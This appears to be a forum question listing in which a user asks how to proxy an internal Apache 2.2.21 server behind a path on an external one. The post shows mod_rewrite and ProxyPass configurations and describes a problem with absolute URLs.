  • apache mod_proxy or mod_rewrite for hide a root of a webserver behind a path

    - by Giovanni Nervi
    I have 2 apache 2.2.21 one external and one internal, I need to map the internal apache behind a path in external apache, but I have some problems with absolute url. I tried these configurations: RewriteEngine on RewriteRule ^/externalpath/(.*)$ http://internal-apache.test.com/$1 [L,P,QSA] ProxyPassReverse /externalpath/ http://internal-apache.test.com/ or <Location /externalpath/> ProxyPass http://internal-apache.test.com/ ProxyPassReverse http://internal-apache.test.com/ </Location> My internal apache use absolute path for search resources as images, css and html and I can't change it now. Some suggestions? Thank you

    Read the article

< Previous Page | 8 9 10 11 12 13 14 15 16 17 18 19  | Next Page >